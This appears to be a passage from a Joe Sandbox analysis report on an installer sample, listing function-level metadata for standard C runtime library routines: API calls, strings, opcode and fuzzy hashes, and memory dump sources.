API ID: std::_$Copy_strExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID: bad locale name
API String ID: 446407826-1405518554
Opcode ID: 06caa6fb5727c01779f625cb6025c0140ed41d8f2475315d2060f4047d2bb169
Instruction ID: ac0bc6cc062376cf7a8b7941f3da4759ce3c0049b0af74a422f32ec35d28eda9
Opcode Fuzzy Hash: 06caa6fb5727c01779f625cb6025c0140ed41d8f2475315d2060f4047d2bb169
Instruction Fuzzy Hash: 2B0161B2901744DECB21EFA9C4804DEFFF4BF14704B40C5AEE56993611C7749608CBA5

Function 00B7966F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00B8D628,00000008,00B79777,00000000,00000000,?,?,00B7A8F0,00B74478,?,?,00B73C60,?,?,00B7101C), ref: 00B79680
__lock.LIBCMT ref: 00B796B4

Part of subcall function 00B7B747: __mtinitlocknum.LIBCMT ref: 00B7B75D
Part of subcall function 00B7B747: __amsg_exit.LIBCMT ref: 00B7B769
Part of subcall function 00B7B747: EnterCriticalSection.KERNEL32(00000000,00000000,?,00B796B9,0000000D), ref: 00B7B771

InterlockedIncrement.KERNEL32(?), ref: 00B796C1
__lock.LIBCMT ref: 00B796D5
___addlocaleref.LIBCMT ref: 00B796F3

Strings

KERNEL32.DLL, xrefs: 00B7967B

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 8251f5613c58d8d8b5dbb5eab963571338126aa33bae9518ea69d8ee7da82358
Instruction ID: c6eecce5b237411fb4c00b0cc165a5388734637bd2a2476d8cb51dd53c4c553c
Opcode Fuzzy Hash: 8251f5613c58d8d8b5dbb5eab963571338126aa33bae9518ea69d8ee7da82358
Instruction Fuzzy Hash: B7016D71840701AFDB24AF65C845749FBF0AF80324F20898EE5AE972B1CBB4A944CF15

Function 00B77993 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 00B779BB

Part of subcall function 00B74842: __getptd.LIBCMT ref: 00B74850
Part of subcall function 00B74842: __getptd.LIBCMT ref: 00B7485E

__getptd.LIBCMT ref: 00B779C5

Part of subcall function 00B7979C: __getptd_noexit.LIBCMT ref: 00B7979F
Part of subcall function 00B7979C: __amsg_exit.LIBCMT ref: 00B797AC

__getptd.LIBCMT ref: 00B779D3
__getptd.LIBCMT ref: 00B779E1
__getptd.LIBCMT ref: 00B779EC
_CallCatchBlock2.LIBCMT ref: 00B77A12

Part of subcall function 00B748E7: __CallSettingFrame@12.LIBCMT ref: 00B74933

Part of subcall function 00B77AB9: __getptd.LIBCMT ref: 00B77AC8
Part of subcall function 00B77AB9: __getptd.LIBCMT ref: 00B77AD6

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: daec75003296c1287732eec78bc6ad0d9f581bdf62f8425779039ca6f7fb91ae
Instruction ID: 957706eb1144b67bbc201edede6754cb5980b14144a46e2b1b8e65d252b6d3ac
Opcode Fuzzy Hash: daec75003296c1287732eec78bc6ad0d9f581bdf62f8425779039ca6f7fb91ae
Instruction Fuzzy Hash: AC11B4B5C10209DFDF00EFA4D445AADBBF0FF08325F1584AAE828A7251DB389A159F55

Function 00B7D1B4 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00B7D1C0

Part of subcall function 00B7979C: __getptd_noexit.LIBCMT ref: 00B7979F
Part of subcall function 00B7979C: __amsg_exit.LIBCMT ref: 00B797AC

__amsg_exit.LIBCMT ref: 00B7D1E0
__lock.LIBCMT ref: 00B7D1F0
InterlockedDecrement.KERNEL32(?), ref: 00B7D20D
_free.LIBCMT ref: 00B7D220
InterlockedIncrement.KERNEL32(01B01650), ref: 00B7D238

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: e9f8e8675e00366ab9ca322c24b410a40c426748f39c8cc1dc2486e6dc5ee9ed
Instruction ID: 02f386761a3cc796af4f5ed11fec87390a044b3a3354981895e9fd26147afe75
Opcode Fuzzy Hash: e9f8e8675e00366ab9ca322c24b410a40c426748f39c8cc1dc2486e6dc5ee9ed
Instruction Fuzzy Hash: D7016132D016119BCB21AF24D80576DB7F0EF447A2F15C095E828B76A1CB34AE42DB95

Function 00B71AEB Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B71AF0
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00B71B04

Part of subcall function 00B732DA: _setlocale.LIBCMT ref: 00B732EC

_free.LIBCMT ref: 00B71B12

Part of subcall function 00B74452: HeapFree.KERNEL32(00000000,00000000,?,00B73C60,?,?,00B7101C), ref: 00B74468
Part of subcall function 00B74452: GetLastError.KERNEL32(?,?,00B73C60,?,?,00B7101C), ref: 00B7447A

_free.LIBCMT ref: 00B71B24
_free.LIBCMT ref: 00B71B36
_free.LIBCMT ref: 00B71B48

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: _free$ErrorFreeH_prologHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 770894815-0
Opcode ID: 917d030b3080225047c4a272afa41a23f7d2abde712768bcfa860fea293c431e
Instruction ID: 82351a30b76a6629b15e1397900d1f6375e13dd3f71743bce157452b59d8e7fb
Opcode Fuzzy Hash: 917d030b3080225047c4a272afa41a23f7d2abde712768bcfa860fea293c431e
Instruction Fuzzy Hash: 41010C716106019BDB24AB6DD906B9BB3E8FB00726F10C99EE07AD6681DB78D9049A60

Function 00B7153B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 00B7155A
std::exception::exception.LIBCMT ref: 00B7157C

Strings

ios_base::failbit set, xrefs: 00B715A4
ios_base::badbit set, xrefs: 00B7156E
ios_base::eofbit set, xrefs: 00B71578, 00B715B4

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3728558374-1866435925
Opcode ID: 9167f44009abc4602a71bb2d8c0da11964cbd1e222ce86e714ff33983d4a898e
Instruction ID: 0165af5371be21f125b15ed0d6d353056e74439390cf4ff082293e52fc46758f
Opcode Fuzzy Hash: 9167f44009abc4602a71bb2d8c0da11964cbd1e222ce86e714ff33983d4a898e
Instruction Fuzzy Hash: B4015EB2800208AACB48EFAD8447AAD7BE49BA0714B14C49AA52B9B112D774DA05CF71

Function 00B77D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 00B77D53

Part of subcall function 00B77CAE: ___BuildCatchObjectHelper.LIBCMT ref: 00B77CE4

_UnwindNestedFrames.LIBCMT ref: 00B77D6A
___FrameUnwindToState.LIBCMT ref: 00B77D78

Strings

csm, xrefs: 00B77D4F, 00B77D64, 00B77D77, 00B77D95, 00B77DA5
csm, xrefs: 00B77D42

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
Instruction ID: b4e7f0d00184aced460dcdb1d06626a68de26b8ed4c7c96f95b8ed152d8cbb8a
Opcode Fuzzy Hash: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
Instruction Fuzzy Hash: D901F671045109BBDF22AF51CC45EAA7FAAFF58350F108064FD2D55121DB3299B1DBA1

Function 00B7DDF8 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00B7DE06

Part of subcall function 00B7729E: __FF_MSGBANNER.LIBCMT ref: 00B772B7
Part of subcall function 00B7729E: __NMSG_WRITE.LIBCMT ref: 00B772BE
Part of subcall function 00B7729E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00B763C9,00000000,00000001,00000000,?,00B7B6D2,00000018,00B8D718,0000000C,00B7B762), ref: 00B772E3

_free.LIBCMT ref: 00B7DE19

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 7f121efae6833e433cb73989c251e201d9f680bcbb9bc22f01a41d7e84b27355
Instruction ID: 2181c709cb4e9236855ac29f4020f4e552362a11a4472d59be79fac648891204
Opcode Fuzzy Hash: 7f121efae6833e433cb73989c251e201d9f680bcbb9bc22f01a41d7e84b27355
Instruction Fuzzy Hash: D1119432808615EACF623B74AC0466E37E5DFA43E0B24C5A5F87EAF250DF3088419652

Function 00B7D935 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00B7D941

Part of subcall function 00B7979C: __getptd_noexit.LIBCMT ref: 00B7979F
Part of subcall function 00B7979C: __amsg_exit.LIBCMT ref: 00B797AC

__getptd.LIBCMT ref: 00B7D958
__amsg_exit.LIBCMT ref: 00B7D966
__lock.LIBCMT ref: 00B7D976
__updatetlocinfoEx_nolock.LIBCMT ref: 00B7D98A

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 8cd5ddcc1b7f5f1304f51326fd663e30bc38bfe225245bb1b9a7d50bac015c8b
Instruction ID: 91f0372d09b42feb2aba55f4f6a89c3485871cfddac68f1beace7a38c5ac4d1a
Opcode Fuzzy Hash: 8cd5ddcc1b7f5f1304f51326fd663e30bc38bfe225245bb1b9a7d50bac015c8b
Instruction Fuzzy Hash: 14F09A329443109ADB65BB689803B5E77F0EF407B0F11C2CAF23DBB1D2CB2449008B56

Function 00B72610 Relevance: 6.2, APIs: 4, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59d5494874f2f65703eeddfcf99a43b39fb131de87f3f4bc868b54f2c296f6f3
Instruction ID: 52d85ca436f335c809ff8007c884dce71c85fadc3628989396ea093e72bb8fd2
Opcode Fuzzy Hash: 59d5494874f2f65703eeddfcf99a43b39fb131de87f3f4bc868b54f2c296f6f3
Instruction Fuzzy Hash: A25192759016099FCF18DFA8C5C18AEB7F9FF18314B2049AEE16AA7251D770EE44CB20

Function 00B75513 Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B755AE
__flush.LIBCMT ref: 00B755CC
__write.LIBCMT ref: 00B755F3
__flsbuf.LIBCMT ref: 00B7561E

Part of subcall function 00B7A8EB: __getptd_noexit.LIBCMT ref: 00B7A8EB

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: cd2d74426b4df6de844ced7a9a3a866c1defe329a49c13b0862e98ce2aafceaf
Instruction ID: 6aa45bc1d93945e126f2abea52cae564cec4e37b3c8c93214b4c428c01b7cf64
Opcode Fuzzy Hash: cd2d74426b4df6de844ced7a9a3a866c1defe329a49c13b0862e98ce2aafceaf
Instruction Fuzzy Hash: C8419371A00F049FDB349F658885A9EBBF6EF90360F24C5A9E47E97180D7B1EE518B40

Function 00B83BE5 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B83C19
__isleadbyte_l.LIBCMT ref: 00B83C4C
MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 00B83C7D
MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 00B83CEB

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 5e4c594ff40a8221d87b2da245a09c57767a6c252f21315a53c3d0cb8bc9fdf4
Instruction ID: dfb7c0430586a5cc86ff6f056e7fad2ecf3a5eca08d7260ecdea822719173c2b
Opcode Fuzzy Hash: 5e4c594ff40a8221d87b2da245a09c57767a6c252f21315a53c3d0cb8bc9fdf4
Instruction Fuzzy Hash: 40319E31A04386EFDB20EF64C894AA97BE5FF01B10F1585E9E466AB1A1D730DE80DF50

Function 00B7DACC Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B7DB33
GetStringTypeW.KERNEL32(?,?,00000000,?,?,00000000), ref: 00B7DB56
__freea.LIBCMT ref: 00B7DB60

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: StringType__freea_memset
String ID:
API String ID: 2013851047-0
Opcode ID: 407f5605f6789827d3e535dedcf8b9b9e35f6fe4ce783cf7042c10268e0eccaf
Instruction ID: 7d7ea97ec14fac1f6357f00c4a5b2258316d3bbd161eb74ec8a112c3458119cf
Opcode Fuzzy Hash: 407f5605f6789827d3e535dedcf8b9b9e35f6fe4ce783cf7042c10268e0eccaf
Instruction Fuzzy Hash: 0B11D07260020AAEDF116F64DC81AAE3BF9EF04390F1584A6FA29D6291DB30DD519760

Function 00B7913A Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00B79160

Part of subcall function 00B78F8C: __fltout2.LIBCMT ref: 00B78FB7

__cftog_l.LIBCMT ref: 00B79186
__cftoe_l.LIBCMT ref: 00B791B8

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 07ea7af6f67f7d7cc0a554a2965a31579b71ac1a15b23bd1c64850513cdc5b5e
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: A7117E7604014ABBCF165E84CC49CEE3FA2FF58390B588495FA2C69430C737C9B1AB81

Function 00B7448C Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00B744A6

Part of subcall function 00B7729E: __FF_MSGBANNER.LIBCMT ref: 00B772B7
Part of subcall function 00B7729E: __NMSG_WRITE.LIBCMT ref: 00B772BE
Part of subcall function 00B7729E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00B763C9,00000000,00000001,00000000,?,00B7B6D2,00000018,00B8D718,0000000C,00B7B762), ref: 00B772E3

std::exception::exception.LIBCMT ref: 00B744DB
std::exception::exception.LIBCMT ref: 00B744F5
__CxxThrowException@8.LIBCMT ref: 00B74506

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: 6d2032b5329793195cadd350dc2a5d35fdbb32ef74147a2f4069c492235d500c
Instruction ID: 5b371513f8bc58434628943230fa71d29a9ae93a9aba4d3aaa89ee052c4d00d6
Opcode Fuzzy Hash: 6d2032b5329793195cadd350dc2a5d35fdbb32ef74147a2f4069c492235d500c
Instruction Fuzzy Hash: D1F0F972544209AFDF40FB68DC06AAD3BE9EB40B14F1480D5F82CA61A2CF718A40EB41

Function 00B735AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00B735CA

Part of subcall function 00B738AC: std::exception::exception.LIBCMT ref: 00B738C1
Part of subcall function 00B738AC: __CxxThrowException@8.LIBCMT ref: 00B738D6
Part of subcall function 00B738AC: std::exception::exception.LIBCMT ref: 00B738E7

Part of subcall function 00B7225E: std::_Xinvalid_argument.LIBCPMT ref: 00B7226F

_memmove.LIBCMT ref: 00B73625

Strings

invalid string position, xrefs: 00B735C5

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
Opcode ID: c2936b74c0ac110a29ac002964baae41312c2d3dfc4f47d047a744290adccabd
Instruction ID: f5d4498e38be89b16e44abe0d4c9f365b74527fc4e658730f1702320314f3aca
Opcode Fuzzy Hash: c2936b74c0ac110a29ac002964baae41312c2d3dfc4f47d047a744290adccabd
Instruction Fuzzy Hash: 5B119831308210ABDB249F19C881A66B3E5EB94F10F10899DF97E87391D771DB01E795

Function 00B72140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00B72156

Part of subcall function 00B738AC: std::exception::exception.LIBCMT ref: 00B738C1
Part of subcall function 00B738AC: __CxxThrowException@8.LIBCMT ref: 00B738D6
Part of subcall function 00B738AC: std::exception::exception.LIBCMT ref: 00B738E7

_memmove.LIBCMT ref: 00B7218F

Strings

invalid string position, xrefs: 00B72151

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: 9628e189a54d8c264580b5f2d348c28bd2eb8c6f245aeb53045d8e05f4652b0f
Instruction ID: c213582b16de008578ee79958d4446cff7f53f0103f8bada62ccad088c36c9b5
Opcode Fuzzy Hash: 9628e189a54d8c264580b5f2d348c28bd2eb8c6f245aeb53045d8e05f4652b0f
Instruction Fuzzy Hash: F90192313042519BD7248F68DCC086BB3F6FBC071076489BDE6A997B45DB70ED4583A4

Function 00B77AB9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B74895: __getptd.LIBCMT ref: 00B7489B
Part of subcall function 00B74895: __getptd.LIBCMT ref: 00B748AB

__getptd.LIBCMT ref: 00B77AC8

Part of subcall function 00B7979C: __getptd_noexit.LIBCMT ref: 00B7979F
Part of subcall function 00B7979C: __amsg_exit.LIBCMT ref: 00B797AC

__getptd.LIBCMT ref: 00B77AD6

Strings

csm, xrefs: 00B77AE4

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
Instruction ID: da7abecdaa6f2ea4220cd61faae0066a39fca49a6a73be07210bb3902c4957c7
Opcode Fuzzy Hash: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
